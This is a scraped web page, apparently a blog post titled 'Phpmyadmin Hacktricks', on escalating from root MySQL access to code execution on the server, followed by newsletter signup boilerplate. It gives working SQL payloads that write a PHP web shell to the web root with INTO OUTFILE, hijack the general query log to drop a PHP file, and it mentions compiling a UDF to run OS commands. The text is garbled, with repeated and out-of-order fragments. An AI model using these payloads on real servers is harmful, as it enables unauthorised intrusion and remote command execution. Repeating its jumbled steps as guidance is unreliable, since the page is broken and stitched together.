Phpmyadmin Hacktricks Apr 2026

Published by: Security Tinkerer Reading time: 6 minutes

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/hack.php'; SELECT '<?php phpinfo(); ?>'; Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective. You have root MySQL access, but you are a low-privilege OS user. How do we escalate? phpmyadmin hacktricks

MySQL needs write permissions to that OS folder, and SELinux/AppArmor usually hates this. 3. When into outfile Fails: The Log File Hijack Modern setups block outfile . But we have a Plan B: General Query Log . Published by: Security Tinkerer Reading time: 6 minutes

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; Boom. You now have a web shell. SET GLOBAL general_log_file = '/var/www/html/hack.php'

We compile a MySQL extension (UDF) that runs OS commands.

close

Sign up to the newsletter: In Brief

Your corporate email address *
First name *
Last name *
Company name *
Job title *
Vist our Privacy Policy for more information about our services, how we may use, process and share your personal data, including information of your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.

Thank you for subscribing

View all newsletters from across the Progressive Media network.

close